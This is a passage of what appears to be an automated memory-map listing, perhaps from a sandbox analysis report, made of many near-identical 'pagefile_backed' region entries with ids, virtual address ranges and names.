	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3382
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3383
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3384
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3385
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3386
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3387
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3388
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3389
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3390
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3391
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3392
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3393
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3394
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3395
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3396
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3397
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3398
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3399
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3400
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3401
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3402
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3403
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3404
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3405
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3406
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3407
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3408
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3409
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3410
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3411
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3412
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3413
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3414
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3415
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3416
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 3417
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3418
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3419
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3420
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3421
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3422
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3423
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3424
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3425
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3426
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3427
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3429
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3430
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3431
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3432
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3433
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3434
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3435
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3436
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3437
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3438
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3439
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3440
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3441
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3442
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3443
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3444
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3445
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3446
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3447
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3448
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3449
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3450
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3451
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3452
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3453
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3454
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3455
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3456
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3457
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3458
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 3459
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3460
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3461
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3462
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3463
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3464
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3465
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3466
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3467
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3468
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3469
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3470
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3471
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3472
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3473
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3474
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3475
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3476
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3477
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3478
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3479
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3480
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3481
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3482
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3483
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3484
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3485
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3486
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3487
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3488
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3489
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3490
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3491
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3492
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3493
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3494
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3495
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3496
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3497
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3498
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3499
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 3500
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3501
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3502
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3503
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3504
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3505
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3506
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3507
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3508
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3509
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3510
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3511
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3512
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3513
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3514
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3515
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3516
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3517
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3518
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3519
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3520
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3521
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3522
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3523
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3524
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3525
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3526
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3527
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3528
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3529
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3530
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3531
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3532
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3533
	        start_va = 0x4cb0000
	          end_va = 0x4cb4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
